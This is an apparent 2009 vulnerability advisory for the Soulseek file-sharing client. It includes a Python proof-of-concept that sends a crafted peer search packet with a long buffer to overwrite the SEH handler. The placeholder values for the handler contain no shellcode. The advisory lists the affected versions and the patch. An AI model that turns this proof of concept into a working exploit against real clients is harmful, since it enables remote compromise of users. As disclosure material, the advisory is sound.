Soulseek 157 NS < 13e & 156.* Remote Peer Search Code Execution
"Soulseek(tm) is a unique ad-free, spyware free, and just plain free file
sharing application.
One of the things that makes Soulseek(tm) unique is our community and
community-related features.
Based on peer-to-peer technology, virtual rooms allow you to meet people
with
the same interests, share information, and chat freely using real-time
messages
in public or private.
Soulseek(tm), with its built-in people matching system, is a great way to
make
new friends and expand your mind!"
Soulseek client allows direct peer file search, allowing a user to find the
files he wants directly on the
peer computer.
Unfortunatly this feature is vulnerable to a remote SEH overwrite.
This proof of concept will target a user called 123yow123.
import struct
import sys, socket
from time import *
ip = "IP_ADDR"
port = "PORT_NUM" #You can find out, how to find out IP/PORT if you RTFM :)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
s.connect((ip,port))
except:
print "Can\'t connect to peer!\n"
sys.exit(0)
junk = "\x41" * 3084
next_seh = struct.pack('<L', 0x42424242)
seh = struct.pack('<L', 0x43434343)
other_junk = "\x61" * 1424
buffer = "\x17\x00\x00\x00\x01\x09\x00\x00\x00\x31\x32\x33\x79\x6f\x77\x31"
buffer+= "\x32\x33\x01\x00\x00\x00\x50\x00\x00\x00\x00\x21\x0c\x00\x00\x08"
buffer+=
"\x00\x00\x00\x6c\x7b\x1d\x0c\x15\x0c\x00\x00"+junk+next_seh+seh+other_junk
s.send(buffer)
After the query is send, the SEH handler will get overwriten.
An attacker could exploit this vulnerability to compromise any prior to 157
NS 13e Soulseek client
Windows all versions
Upgrade to 157 NS 13e
(http://slsknet.org/download.html)
This vulnerability has been discovered by Laurent Gaffié
Laurent.gaffie{remove-this}(at)gmail.com
july 02, 2009
The information contained within this advisory is supplied "as-is"
with no warranties or guarantees of fitness of use or otherwise.
I accept no responsibility for any damage caused by the use or
misuse of this information.
Souleek team as patched this bug month ago, a distributed message urging
users to upgrade them Soulseek client
is still send since a month, and not much users still use vulnerable
Soulseek versions.
@to the one who like to rip bugs and make an exploit ""universal"" for fame,
just make sure it's at least
universal before you say so.
For the others : http://www.youtube.com/watch?v=tVACUjHn6yU :)
@RIIA : http://www.openp2p.com/pub/a/p2p/2002/12/11/piracy.html